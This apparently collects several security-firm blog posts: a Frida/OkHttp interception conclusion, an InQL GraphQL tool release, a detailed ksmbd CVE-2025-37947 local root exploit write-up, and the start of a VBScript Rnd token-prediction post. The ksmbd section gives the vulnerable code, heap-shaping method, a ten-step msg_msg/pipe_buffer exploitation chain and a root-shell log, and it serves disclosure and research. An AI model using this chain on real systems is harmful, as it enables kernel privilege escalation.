Conclusion

In this post we walked through a practical approach to dynamically intercept OkHttp traffic using Frida.

We started by instrumenting RealCall.execute() and RealCall.enqueue(), which gives quick visibility into endpoints and plaintext request bodies. While useful, this approach quickly falls short once applications rely on OkHttp interceptors to add authentication headers, calculate signatures, or encrypt payloads.

By moving one level deeper and hooking RealInterceptorChain.proceed(), we were able to observe the request as it evolves through each interceptor in the chain. This allowed us to reconstruct the full application protocol step by step - from the original JSON payload, through header enrichment and signing, then all the way to the final encrypted body sent over the wire.

This technique is especially useful during security assessments, where understanding how a request is built is often more important than simply seeing the final bytes on the network. Mapping concrete request mutations back to specific interceptor classes also provides clear entry points for reverse-engineering custom cryptography, signatures, or authorization logic.

In short, when dealing with modern Android applications, intercepting OkHttp at a single point is rarely sufficient. Combining multiple injection points — and in particular leveraging the interceptor chain — provides the visibility needed to fully understand and manipulate application-level protocols.

InQL v6.1.0 Just Landed with New Features and Contribution Swag! 🚀

2025-12-02T00:00:00+01:00

Introduction

We are excited to announce a new release of our Burp Suite Extension - InQL v6.1.0! The complete re-write from Jython to Kotlin in our previous update (v6.0.0) laid the groundwork for us to start implementing powerful new features, and this update delivers the first exciting batch.

This new version introduces key features like our new GraphQL schema brute-forcer (which abuses “did you mean…” suggestions), server engine fingerprinter, automatic variable generation when sending requests to Repeater/Intruder, and various other quality-of-life and performance improvements.

Key New Features

The GraphQL Schema Brute-Forcer

Until now, InQL was most helpful when a server had introspection enabled or when you already had the GraphQL schema file. With v6.1.0, the tool can now attempt to reconstruct the backend schema by abusing the “did you mean…” suggestions supported by many GraphQL server implementations.

This feature was inspired by the excellent Clairvoyance CLI tool. We implemented a similar algorithm, also based on regular expressions and batch queries. Building this directly into InQL brings it one step closer to being the all-in-one Swiss Army knife for GraphQL security testing, allowing researchers to access every tool they need in one place.

How It Works

When InQL fails to fetch a schema because introspection is disabled, you can now choose to “Launch schema bruteforcer”. The tool will then start sending hundreds of batched queries containing field and argument names guessed from a wordlist.

InQL then analyzes the server’s error messages, looking for specific errors like Argument 'contribution' is required or Field 'bugs' not found on type 'inql'. It also parses helpful suggestions, such as Did you mean 'openPR'?, which greatly speed up discovery. At the same time, it probes the types of found fields and arguments (like String, User, or [Episode!]) by intentionally triggering type-specific error messages.

This process repeats until the entire reachable schema is mapped out. The result is a reconstructed schema, built piece-by-piece from the server’s own validation feedback. All without introspection.
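To make the suggestion-parsing step more concrete, here is a minimal Python sketch of how names could be pulled out of a "Did you mean" hint with regular expressions. It is not InQL's actual code: the function name extract_suggestions and both patterns are assumptions for illustration, and real servers word these errors differently, so a practical tool needs engine-specific patterns.

```python
import re

# Hypothetical patterns (not taken from InQL): error wording varies by engine.
SUGGESTION_RE = re.compile(r"Did you mean (.+?)\?")
QUOTED_NAME_RE = re.compile(r"['\"]([_A-Za-z][_0-9A-Za-z]*)['\"]")


def extract_suggestions(error_message: str) -> list:
    """Return the field or argument names offered in a 'Did you mean' hint."""
    names = []
    for hint in SUGGESTION_RE.findall(error_message):
        # A single hint may list several quoted candidates.
        for name in QUOTED_NAME_RE.findall(hint):
            if name not in names:
                names.append(name)
    return names


if __name__ == "__main__":
    message = "Field 'openPr' not found on type 'inql'. Did you mean 'openPR'?"
    print(extract_suggestions(message))
```

Every name recovered this way can be fed back into the next batch of guesses, which is why suggestions shorten the scan so much compared to a blind wordlist.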

Be aware that the scan can take time. Depending on the schema’s complexity, server rate-limiting, and the wordlist size, a full reconstruction can take anywhere from a few minutes to several hours. We recommend visiting the InQL settings tab to properly set up the scan for your specific target.


The GraphQL Server Engine Fingerprinter

The new version of InQL can now fingerprint the GraphQL engine used by the back-end server. Each GraphQL engine implements slightly different security protections and insecure defaults, opening the door to unique, engine-specific attack vectors.

The fingerprinted engine can be looked up in the GraphQL Threat Matrix by Nick Aleks. The matrix is a fantastic resource for confirming which implementation may be vulnerable to specific GraphQL threats.

How It Works

Similarly to the graphw00f CLI tool, InQL sends a series of specific GraphQL queries to the target server and observes how it responds. It can differentiate the specific engines by analyzing the unique nuances in their error messages and responses.

For example, for the following query:

query @deprecated {
    __typename
}

An Apollo server typically responds with an error message stating Directive "@deprecated" may not be used on QUERY. A GraphQL Ruby server, however, responds with the message '@deprecated' can't be applied to queries.

When InQL successfully fingerprints the engine, it displays details about its implementation right in the UI, based on data from the GraphQL Threat Matrix.
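The matching step can be sketched in a few lines of Python. This is only an illustration built from the two example responses above, not InQL's implementation: the SIGNATURES table and the guess_engine helper are hypothetical, and a real fingerprinter sends many probes and keeps many signatures per engine.

```python
import re

# The probe from the example above, written on one line.
PROBE_QUERY = "query @deprecated { __typename }"

# Hypothetical signature table built only from the two messages quoted in the text.
SIGNATURES = [
    ("Apollo", re.compile(r'Directive "@deprecated" may not be used on QUERY')),
    ("GraphQL Ruby", re.compile(r"'@deprecated' can't be applied to queries")),
]


def guess_engine(error_messages):
    """Return the first engine whose signature matches any error message."""
    for message in error_messages:
        for engine, pattern in SIGNATURES:
            if pattern.search(message):
                return engine
    return None  # unknown engine, more probes would be needed


if __name__ == "__main__":
    print(guess_engine(["'@deprecated' can't be applied to queries"]))
```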


Automatic Variable Generation (Default Values)

While previous InQL versions were great for analyzing schemas, finding circular references, and identifying points-of-interest, actually crafting a valid query could be frustrating. The tool didn’t handle variables, forcing you to fill them in manually. The new release finally fixes that pain point.

Now, when you use “Send to Repeater” or “Send to Intruder” on a query that requires variables (like a search argument of type String), InQL will automatically populate the request with placeholder values. This simple change significantly improves the speed and flow of testing GraphQL APIs.

Here are the default values InQL will now use:

"String" -> "exampleString"
"Int" -> 42
"Float" -> 3.14
"Boolean" -> true
"ID" -> "123"
ENUM -> First value
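As a rough illustration of the mapping above, the following Python sketch builds a variables object from a list of arguments. The helper names (placeholder_for, build_variables) and the input shape are assumptions made for this example; how InQL treats lists, input objects, or custom scalars is not covered here.

```python
from typing import Any, Optional, Sequence

# Default placeholders as listed above.
SCALAR_DEFAULTS = {
    "String": "exampleString",
    "Int": 42,
    "Float": 3.14,
    "Boolean": True,
    "ID": "123",
}


def placeholder_for(type_name: str, enum_values: Optional[Sequence[str]] = None) -> Any:
    """Pick a placeholder: first enum value for enums, table lookup for scalars."""
    if enum_values:
        return enum_values[0]
    return SCALAR_DEFAULTS.get(type_name)  # None for types this sketch ignores


def build_variables(arguments: dict) -> dict:
    """arguments maps a variable name to (type name, enum values or None)."""
    return {
        name: placeholder_for(type_name, enum_values)
        for name, (type_name, enum_values) in arguments.items()
    }


if __name__ == "__main__":
    args = {"search": ("String", None), "episode": ("Episode", ["NEWHOPE", "EMPIRE"])}
    print(build_variables(args))
```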

Usability and Performance Improvements

We also implemented various usability and performance improvements. These changes include:

Search inside the InQL Scanner tab, and in the Repeater/Intruder
Improved POI Regex matching
Improved caching for better performance
Added a delayed POI and cycle detection to improve the schema parsing speed
Various bug and UI fixes

Join the InQL Community (And Get Swag!)

InQL is an open-source project, and we welcome every contribution. We want to take this opportunity to thank the community for all the support, bug reports, and feedback we’ve received so far!

With this new release, we’re excited to announce a new initiative to reward contributors. To show our appreciation, we’ll be sending exclusive Doyensec swag and/or gift cards to community members who fix issues or create new features.

To make contributing easy, make sure to read the project’s README.md file and review the existing issues on GitHub. We encourage you to start with tasks labeled Good First Issue or Help Wanted.

Some of the good first issues we would like to see your contribution for:

If you have an idea for a new feature or have found a bug, please open a new issue to discuss it before you start building. This helps everyone get on the same page.

We can’t wait to see your pull requests!

Conclusion

As we’ve mentioned, we are extremely excited about this new release and the direction InQL is heading. We hope to see more contributions from the ever-growing cybersecurity community and can’t wait to see what the future brings!

Remember to update to the latest version and check out our InQL page on GitHub.

Happy Hacking!

ksmbd - Exploiting CVE-2025-37947 (3/3)

2025-10-08T00:00:00+02:00

Introduction

This is the last of our posts about ksmbd. For the previous posts, see part1 and part2.

Considering all discovered bugs and proof-of-concept exploits we reported, we had to select some suitable candidates for exploitation. In particular, we wanted to use something reported more recently to avoid downgrading our working environment.

We first experimented with several use-after-free (UAF) bugs, since this class of bugs has a reputation for almost always being exploitable, as proven in numerous articles. However, many of them required race conditions and specific timing, so we postponed them in favor of bugs with more reliable or deterministic exploitation paths.

Then there were bugs that depended on factors outside user control, or that had peculiar behavior. Let’s first look at CVE-2025-22041, which we initially intended to use. Due to missing locking, it’s possible to invoke the ksmbd_free_user function twice:

void ksmbd_free_user(struct ksmbd_user *user)
{
	ksmbd_ipc_logout_request(user->name, user->flags);
	kfree(user->name);
	kfree(user->passkey);
	kfree(user);
}

In this double-free scenario, an attacker has to replace user->name with another object, so it can be freed the second time. The problem is that the kmalloc cache size depends on the size of the username. If it is slightly longer than 8 characters, it will fit into kmalloc-16 instead of kmalloc-8, which means different exploitation techniques are required, depending on the username length.

Hence we decided to take a look at CVE-2025-37947, which seemed promising from the start. We considered remote exploitation by combining the bug with an infoleak, but we lacked a primitive such as a writeleak, and we were not aware of any such bug having been reported in the last year. Even so, as mentioned, we restricted ourselves to bugs we had discovered.

This bug alone appeared to offer the capabilities we needed to bypass common mitigations (e.g., KASLR, SMAP, SMEP, and several Ubuntu kernel hardening options such as HARDENED_USERCOPY). So, due to additional time constraints, we ended up focusing on a local privilege escalation only. Note that at the time of writing this post, we implemented the exploit on Ubuntu 22.04.5 LTS with the latest kernel (5.15.0-153-generic) that was still vulnerable.

Root cause analysis

The finding requires the streams_xattr module to be enabled in the vfs objects configuration option and can be triggered by an authenticated user. In addition, a writable share must be added to the default configuration as follows:

[share]
        path = /share
        vfs objects = streams_xattr
        writeable = yes

Here is the vulnerable code, with a few unrelated lines removed that do not affect the bug’s logic:

// https://elixir.bootlin.com/linux/v5.15/source/fs/ksmbd/vfs.c#L411

static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,
				  size_t count)
{
    char *stream_buf = NULL, *wbuf;
    struct mnt_idmap *idmap = file_mnt_idmap(fp->filp);
    size_t size;
    ssize_t v_len;
    int err = 0;
    
    ksmbd_debug(VFS, "write stream data pos : %llu, count : %zd\n",
        *pos, count);

    size = *pos + count;
    if (size > XATTR_SIZE_MAX) { // [1]
        size = XATTR_SIZE_MAX;
        count = (*pos + count) - XATTR_SIZE_MAX;
    }

    wbuf = kvmalloc(size, GFP_KERNEL | __GFP_ZERO); // [2]
    stream_buf = wbuf;

    memcpy(&stream_buf[*pos], buf, count); // [3]

    // .. snip 

    if (err < 0)
        goto out;

    fp->filp->f_pos = *pos;
    err = 0;
out:
    kvfree(stream_buf);
    return err;
}

The size of the extended attribute value XATTR_SIZE_MAX is 65536, or 16 pages (0x10000), assuming a common page size of 0x1000 bytes. We can see at [1] that if the count and the position surpass this value, the size is truncated to 0x10000, allocated at [2].

Hence, we can set the position to 0x10000 and count to 0x8, and memcpy(&stream_buf[0x10000], buf, 8) will write 8 bytes of user-controlled data out of bounds at [3]. Note that we can also shift the position to control the offset; for instance, the value 0x10010 writes at offset 16. However, the number of bytes copied (count) is then incremented by 16 too, so we end up copying 24 bytes, potentially corrupting more data. This is often not desired, depending on the alignment we can achieve.
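The arithmetic is easy to get wrong by hand, so here is a small Python model of the size and count computation at [1]. It only mirrors the integer math of the excerpt above; the function name stream_write_bounds and its return tuple are made up for this sketch.

```python
XATTR_SIZE_MAX = 0x10000  # 65536 bytes, as stated above


def stream_write_bounds(pos: int, count: int):
    """Model the arithmetic at [1] and describe the memcpy at [3].

    Returns (alloc_size, copy_len, oob_offset, oob_bytes), where oob_offset
    is the distance past the end of the buffer at which the first
    out-of-bounds byte lands.
    """
    size = pos + count
    if size > XATTR_SIZE_MAX:
        size = XATTR_SIZE_MAX
        count = (pos + count) - XATTR_SIZE_MAX
    copy_end = pos + count           # memcpy(&stream_buf[pos], buf, count)
    oob_start = max(pos, size)       # first byte beyond the allocation
    oob_bytes = max(0, copy_end - oob_start)
    return size, count, oob_start - size, oob_bytes


if __name__ == "__main__":
    for pos in (0x10000, 0x10010):
        size, copy_len, off, oob = stream_write_bounds(pos, 8)
        print(f"pos={pos:#x}: alloc={size:#x} copy={copy_len} oob_offset={off} oob_bytes={oob}")
```

With pos set to 0x10010 the model reports 24 copied bytes starting 16 bytes past the buffer, matching the description above.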

Proof of Concept

To demonstrate that the vulnerability is reachable, we wrote a minimal proof of concept (PoC). This PoC only triggers the bug - it does not escalate privileges. Additionally, after changing the permissions of /proc/pagetypeinfo to be readable by an unprivileged user, it can be used to confirm the buffer allocation order. The PoC code authenticates using smbuser/smbpassword credentials via the libsmb2 library and uses the same socket as the connection to send the vfs stream data with user-controlled attributes.

Specifically, we set file_offset to 0x0000010018ULL and length_wr to 8, writing 32 bytes filled with 0xaa and 0xbb patterns for easy recognition.

If we run the PoC, print the allocation address, and break on memcpy, we can confirm the OOB write:

(gdb) c
Continuing.
ksmbd_vfs_stream_write+310 allocated: ffff8881056b0000

Thread 2 hit Breakpoint 2, 0xffffffffc06f4b39 in memcpy (size=32, 
    q=0xffff8881031b68fc, p=0xffff8881056c0018)
    at /build/linux-eMJpOS/linux-5.15.0/include/linux/fortify-string.h:191
warning: 191	/build/linux-eMJpOS/linux-5.15.0/include/linux/fortify-string.h: No such file or directory
(gdb) x/2xg $rsi
0xffff8881031b68fc:	0xaaaaaaaaaaaaaaaa	0xbbbbbbbbbbbbbbbb

Heap Shaping for `kvzalloc`

On Linux, physical memory is managed in pages (usually 4KB), and the page allocator (buddy allocator) organizes them in power-of-two blocks called orders. Order 0 is a single page, order 1 is 2 contiguous pages, order 2 is 4 pages, and so on. This allows the kernel to efficiently allocate and merge contiguous page blocks.

With that, we have to take a look at how exactly the memory is allocated via kvzalloc. The function is just a wrapper around kvmalloc that returns zeroed memory:

// https://elixir.bootlin.com/linux/v5.15/source/include/linux/mm.h#L811
static inline void *kvzalloc(size_t size, gfp_t flags)
{
    return kvmalloc(size, flags | __GFP_ZERO);
}

Then the function calls kvmalloc_node, attempting to allocate physically contiguous memory using kmalloc, and if that fails, it falls back to vmalloc to obtain memory that only needs to be virtually contiguous. We were not trying to create memory pressure to exploit the latter allocation mechanism, so we can assume the function behaves like kmalloc().

Since Ubuntu uses the SLUB allocator for kmalloc by default, the call continues into __kmalloc_node. That function serves requests of up to KMALLOC_MAX_CACHE_SIZE bytes, which has the value 8192 (two pages, i.e. order-1), from kmalloc_caches.

// https://elixir.bootlin.com/linux/v5.15/source/mm/slub.c#L4424
void *__kmalloc_node(size_t size, gfp_t flags, int node)
{
	struct kmem_cache *s;
	void *ret;

	if (unlikely(size > KMALLOC_MAX_CACHE_SIZE)) {
		ret = kmalloc_large_node(size, flags, node);

		trace_kmalloc_node(_RET_IP_, ret,
				   size, PAGE_SIZE << get_order(size),
				   flags, node);

		return ret;
	}

	s = kmalloc_slab(size, flags);

	if (unlikely(ZERO_OR_NULL_PTR(s)))
		return s;

	ret = slab_alloc_node(s, flags, node, _RET_IP_, size);

	trace_kmalloc_node(_RET_IP_, ret, size, s->size, flags, node);

	ret = kasan_kmalloc(s, ret, size, flags);

	return ret;
}

For anything larger, the Linux kernel gets pages directly using the page allocator:

// https://elixir.bootlin.com/linux/v5.15/source/mm/slub.c#L4407
#ifdef CONFIG_NUMA
static void *kmalloc_large_node(size_t size, gfp_t flags, int node)
{
	struct page *page;
	void *ptr = NULL;
	unsigned int order = get_order(size);

	flags |= __GFP_COMP;
	page = alloc_pages_node(node, flags, order);
	if (page) {
		ptr = page_address(page);
		mod_lruvec_page_state(page, NR_SLAB_UNRECLAIMABLE_B,
				      PAGE_SIZE << order);
	}

	return kmalloc_large_node_hook(ptr, size, flags);
}

So, since we have to request 16 pages, we are dealing with buddy allocator page shaping, and we aim to overflow memory that follows an order-4 allocation. The question is what we can place there and how to ensure proper positioning.
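The order computation can be checked with a short Python sketch. It assumes a 4 KB page size and the KMALLOC_MAX_CACHE_SIZE value mentioned above; get_order here is a plain reimplementation of the idea (smallest power-of-two number of pages that fits the request), not the kernel's code, and allocation_path is a hypothetical helper.

```python
PAGE_SIZE = 0x1000             # assumption: 4 KB pages
KMALLOC_MAX_CACHE_SIZE = 8192  # value quoted in the text


def get_order(size: int) -> int:
    """Smallest order such that (PAGE_SIZE << order) >= size."""
    pages = (size + PAGE_SIZE - 1) // PAGE_SIZE
    order = 0
    while (1 << order) < pages:
        order += 1
    return order


def allocation_path(size: int) -> str:
    """Which branch of __kmalloc_node a request of this size would take."""
    if size > KMALLOC_MAX_CACHE_SIZE:
        return f"page allocator, order-{get_order(size)}"
    return "kmalloc slab cache"


if __name__ == "__main__":
    print(allocation_path(0x10000))  # the stream_buf request
    print(allocation_path(4096))     # e.g. a 4 KB msg_msg allocation
```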

A key constraint is that memcpy() happens immediately after the allocation. This rules out spraying after allocation. Therefore, we must create a 16-page contiguous free space in memory in advance, so that kvzalloc() places stream_buf in that region. This way, the out-of-bounds write hits a controlled and useful target object.

There are various objects that could be allocated in kernel memory, but most common ones use kmalloc caches. So we investigated which could be a good fit, where the order value indicates the page order used for allocating slabs that hold those objects:

$ for i in /sys/kernel/slab/*/order; do \
    sudo cat $i | tr -d '\n'; echo " -> $i"; \
done | sort -rn | head 

-> /sys/kernel/slab/UDPv6/order
-> /sys/kernel/slab/UDPLITEv6/order
-> /sys/kernel/slab/TCPv6/order
-> /sys/kernel/slab/TCP/order
-> /sys/kernel/slab/task_struct/order
-> /sys/kernel/slab/sighand_cache/order
-> /sys/kernel/slab/sgpool-64/order
-> /sys/kernel/slab/sgpool-128/order
-> /sys/kernel/slab/request_queue/order
-> /sys/kernel/slab/net_namespace/order

We see that these slab caches use order-3 pages at most. Based on that, our choice became kmalloc-cg-4k (not shown in the output), which we can easily spray. It’s versatile for achieving various exploitation primitives, such as arbitrary read, write, or in some cases, even UAF.

After experimenting with order-3 page allocations and checking /proc/pagetypeinfo, we confirmed that there are 5 freelists per order, per zone. In our case, zone Normal is used, and GFP_KERNEL prefers the Unmovable migrate type, so we can ignore the others:

$ sudo cat /proc/pagetypeinfo 
Page block order: 9
Pages per block:  512

Free pages count per migrate type at order  0    1   2   3   4   5   6   7   8   9   10
Node  0, zone     DMA, type    Unmovable    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone     DMA, type      Movable    0    0   0   0   0   0   0   0   0   1    3
Node  0, zone     DMA, type  Reclaimable    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone     DMA, type   HighAtomic    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone     DMA, type      Isolate    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone   DMA32, type    Unmovable    0    0   0   0   0   0   0   1   0   1    0
Node  0, zone   DMA32, type      Movable    2    2   1   1   0   3   3   3   2   3  730
Node  0, zone   DMA32, type  Reclaimable    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone   DMA32, type   HighAtomic    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone   DMA32, type      Isolate    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone  Normal, type    Unmovable   69   30   7   9   3   1  30  63  37  28   36
Node  0, zone  Normal, type      Movable   37    7   3   5   5   3   5   2   2   4 1022
Node  0, zone  Normal, type  Reclaimable    3    2   1   2   1   0   0   0   0   1    0
Node  0, zone  Normal, type   HighAtomic    0    0   0   0   0   0   0   0   0   0    0
Node  0, zone  Normal, type      Isolate    0    0   0   0   0   0   0   0   0   0    0

Number of blocks type     Unmovable      Movable  Reclaimable   HighAtomic      Isolate 
Node 0, zone      DMA            1            7            0            0            0 
Node 0, zone    DMA32            2         1526            0            0            0 
Node 0, zone   Normal          182         2362           16            0            0

The output shows 9 free elements for order-3 and 3 for order-4. By calling kvmalloc(0x10000, GFP_KERNEL | __GFP_ZERO), we can double-check that the number of order-4 elements is decremented. We can compare the state before and after the allocation:

Free pages count per migrate type at order     0    1    2   3  4  5  6   7   8   9  10
Node    0, zone   Normal, type    Unmovable  843  592  178  14  6  7  4  47  45  26  32 
Node    0, zone   Normal, type    Unmovable  843  592  178  14  5  7  4  47  45  26  32
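Comparing these rows by eye gets tedious when the check is repeated many times. A minimal Python sketch for parsing one "Free pages count" row could look like this; parse_free_counts is a hypothetical helper written for this example and assumes the row layout shown above.

```python
def parse_free_counts(line: str) -> dict:
    """Parse one 'Free pages count' data row of /proc/pagetypeinfo."""
    head, _, tail = line.partition("type")
    fields = tail.split()
    zone = head.split("zone")[1].strip(" ,")
    return {
        "zone": zone,
        "type": fields[0],
        "free": [int(n) for n in fields[1:]],  # index == order
    }


if __name__ == "__main__":
    before = parse_free_counts(
        "Node    0, zone   Normal, type    Unmovable  843  592  178  14  6  7  4  47  45  26  32"
    )
    after = parse_free_counts(
        "Node    0, zone   Normal, type    Unmovable  843  592  178  14  5  7  4  47  45  26  32"
    )
    changed = [o for o, (b, a) in enumerate(zip(before["free"], after["free"])) if b != a]
    print(before["zone"], before["type"], "orders changed:", changed)
```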

When the allocator runs out of order-3 and order-4 blocks, it starts splitting higher-order blocks - like order-5 - to satisfy new requests. This splitting is recursive: an order-5 block becomes two order-4 blocks, one of which is then split again if needed.

In our scenario, once we exhaust all order-3 and order-4 freelist entries, the allocator pulls an order-5 block. One half is split to satisfy a lower-order allocation - our target order-3 object. The other half remains a free order-4 block and can later be used by kvzalloc for the stream_buf.

Even though this layout is not guaranteed, after repeating this several times, it gives us a relatively high probability of a scenario where the stream_buf allocation lands directly after the order-3 object, allowing us to corrupt its memory through the out-of-bounds write.
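The splitting behavior described above can be illustrated with a toy model in Python. This is a deliberately simplified sketch (a single set of free lists, offsets counted in pages, no merging, no migrate types, no per-CPU lists), and the ToyBuddy class is invented for this example; it does not predict the layout on a live system.

```python
class ToyBuddy:
    """Toy model of buddy free lists; block offsets are in pages."""

    MAX_ORDER = 10  # highest order shown in /proc/pagetypeinfo above

    def __init__(self, free_blocks: dict):
        # free_blocks maps order -> list of starting page offsets
        self.free = {order: list(blocks) for order, blocks in free_blocks.items()}

    def alloc(self, order: int) -> int:
        # Find the smallest order at or above the request with a free block.
        current = order
        while not self.free.get(current):
            current += 1
            if current > self.MAX_ORDER:
                raise MemoryError("no free block large enough")
        start = self.free[current].pop()
        # Split downwards, returning each upper half to its free list.
        while current > order:
            current -= 1
            self.free.setdefault(current, []).append(start + (1 << current))
        return start


if __name__ == "__main__":
    # Order-3 and order-4 lists exhausted, one order-5 block left at page 0.
    heap = ToyBuddy({3: [], 4: [], 5: [0]})
    victim = heap.alloc(3)      # slab page for the sprayed objects
    stream_buf = heap.alloc(4)  # the 16-page kvzalloc request
    print(f"order-3 block at page {victim}, order-4 block at page {stream_buf}")
```

In this model the order-3 request is carved out of one half of the order-5 block, and the untouched half is exactly the free order-4 block that the later 16-page request receives.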

By allocating 1024 messages (msg_msg), with a message size of 4096 to fit into kmalloc-cg-4k, we obtained the following layout centered around stream_buf at 0xffff8881117b0000, where the red strip marks the target pages and the blue represents msg_msg objects:

When we zoomed in, we confirmed that it is indeed possible to place stream_buf before one of the messages:

Note that the probability of overwriting the victim object was significantly improved by receiving messages and creating holes. However, in a minority of cases - less than 10% in our results - the exploit failed.

This can occur when we overwrite different objects, depending on the state of ksmbd or external processes. Unfortunately, with some probability, this can also result in a kernel panic.

Exploitation Strategy

After being able to trigger the OOB write, the local escalation becomes almost straightforward. We tried several approaches, such as corrupting the next pointer in a segmented msg_msg, described in detail here. However, using this method there was no easy way to obtain a KASLR leak, and we did not want to rely on side-channel attacks such as Retbleed. Therefore, we had to revisit our strategy.

The one from the near-canonical write-up CVE-2021-22555: Turning \x00\x00 into 10000$ was the best fit. Because we overwrote physical pages instead of Slab objects, we did not have to deal with cross-cache attacks introduced by accounting, and the post-exploitation phase required only a few modifications.

First, we confirmed the addresses of the allocations via a bpf script, to ensure that they are properly aligned.

$ sudo ./bpf-tracer.sh
...
$ grep 4048 out-4096.txt  | egrep ".... total" -o | sort | uniq -c
0000 total
1000 total
2000 total
3000 total
4000 total
5000 total
6000 total
7000 total
8000 total
9000 total
a000 total
b000 total
c000 total
d000 total
e000 total
f000 total

Our choice to create a collision by overwriting the two least significant bytes with \x05\x00 was kind of arbitrary. After that, we just re-implemented all the stages, and we were even able to find similar ROP gadgets for stack pivoting.

We strongly recommend reading the original article to make all steps clear, as it provides the missing information which we did not want to repeat here.

With that in place, the exploit flow was the following:

Allocate many msg_msg objects in the kernel.
Trigger an OOB write in ksmbd to allocate stream_buf, and overwrite the primary message’s next pointer so two primary messages point to the same secondary message.
Detect the corrupted pair by tagging every message with its queue index and scanning queues with msgrcv(MSG_COPY) to find mismatched tags.
Free the real secondary message (from the real queue) to create a use-after-free - the fake queue still holds a stale pointer to the freed buffer.
Spray userland objects over the freed slot via UNIX sockets so we can reclaim the freed memory with controlled data by crafting a fake msg_msg.
Abuse m_ts to leak kernel memory: craft the fake msg_msg so copy_msg returns more data than intended and read adjacent headers and pointers to leak kernel heap addresses for mlist.next and mlist.prev.
With the help of an sk_buff spray, rebuild the fake msg_msg with correct mlist.next and mlist.prev so it can be unlinked and freed normally.
Spray and reclaim that UAF with struct pipe_buffer objects so we can leak anon_pipe_buf_ops and compute the kernel base to bypass KASLR.
Create a fake pipe_buf_operations structure by spraying sk_buff a second time, with the release operation pointer pointing into crafted gadget sequences.
Trigger the release callbacks by closing pipes - this starts the ROP chain with stack pivoting.

Final Exploit

The final exploit is available here, though it may take several attempts:

...
[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[-] Error could not corrupt any primary message.
[ ] Attempt: 3

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: 1a00
[+] real_idx: 1a08

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff8f17c6e88000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff8f17d3bb5000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffa3242700
[+] kbase_addr: ffffffffa2000000
[+] leaked kslide: 21000000

[+] STAGE 4: Kernel code execution
[*] Releasing pipe_buffer objects...
[*] Returned to userland
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux target22 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
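The STAGE 3 values in the log are related by simple arithmetic, sketched below in Python. The symbol offset is not taken from the exploit source; it is inferred here from the log itself (leaked pointer minus reported base) and is specific to that kernel build. The default text base is the usual x86_64 address without KASLR.

```python
# Usual x86_64 kernel text base when KASLR is disabled.
DEFAULT_KERNEL_TEXT_BASE = 0xFFFFFFFF81000000

# Assumption: offset inferred from the log above (leak minus reported base).
# It only applies to that exact kernel build.
ANON_PIPE_BUF_OPS_OFFSET = 0x1242700


def kaslr_from_leak(leaked_anon_pipe_buf_ops: int):
    """Derive the randomized kernel base and the slide from one leaked pointer."""
    kbase = leaked_anon_pipe_buf_ops - ANON_PIPE_BUF_OPS_OFFSET
    kslide = kbase - DEFAULT_KERNEL_TEXT_BASE
    return kbase, kslide


if __name__ == "__main__":
    kbase, kslide = kaslr_from_leak(0xFFFFFFFFA3242700)
    print(f"kbase_addr: {kbase:x}")
    print(f"kslide:     {kslide:x}")
```

Once the slide is known, every gadget address used in the ROP chain can be rebased by adding it to the address from the non-randomized kernel image.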

Note that reliability could still be improved, because we did not try to find optimal values for the number of sprayed-and-freed objects used for corruption. We arrived at the values experimentally and obtained satisfactory results.

Conclusion

We successfully demonstrated the exploitability of the bug in ksmbd on the latest Ubuntu 22.04 LTS using the default configuration and enabling the ksmbd service. A full exploit to achieve local root escalation was also developed.

A flaw in ksmbd_vfs_stream_write() allows out-of-bounds writes when pos exceeds XATTR_SIZE_MAX, enabling corruption of adjacent pages with kernel objects. Local exploitation can reliably escalate privileges. Remote exploitation is considerably more challenging: an attacker would be constrained to the code paths and objects exposed by ksmbd, and a successful remote attack would additionally require an information leak to defeat KASLR and make the heap grooming reliable.


Yet Another Random Story: VBScript's Randomize Internals

2025-09-25T00:00:00+02:00

In one of our recent posts, Dennis shared an interesting case study of C# exploitation that rode on Random-based password-reset tokens. He demonstrated how to use the single-packet attack, or a bit of old-school math, to beat the game. Recently, I performed a security test on a target which had a dependency written in VBScript. This blog post focuses on VBS’s Rnd and shows that the situation there is even worse.

Target Application

The application was responsible for generating a secret token. The token was supposed to be unpredictable and expected to remain secret. Here’s a rough copy of the token generation code:

Dim chars, n
chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789()*&^%$#@!"
n = 32

function GenerateToken(chars, n)
	Dim result, pos, i, charsLength
	charsLength = Int(Len(chars))	
	
	For i = 1 To n
		Randomize
		pos = Int((Rnd * charsLength) + 1)
		result = result & Mid(chars, pos, 1)
	Next
	
	GenerateToken = result	
end function

The first thing I noticed was that the Randomize function was called inside a loop. That should reseed the PRNG on every single iteration, right? That could result in repeated values. Well, contrary to many other programming languages, in VBScript, using Randomize within a loop is not a problem per se. The function will not reset the initial state if the same seed is passed again (even if implicitly). This prevents generating identical sequences of characters within a single GenerateToken call. If you actually want that behavior, call Rnd with a negative argument immediately before calling Randomize with a numeric argument.

But if that isn’t an issue, then what is?

How VBS’s `Randomize` Works in Practice

Here’s a short API breakdown:

Randomize     ' seed the global PRNG using the system clock
Randomize s   ' seed the global PRNG using a specified seed value
r = Rnd()     ' next float in [0,1)

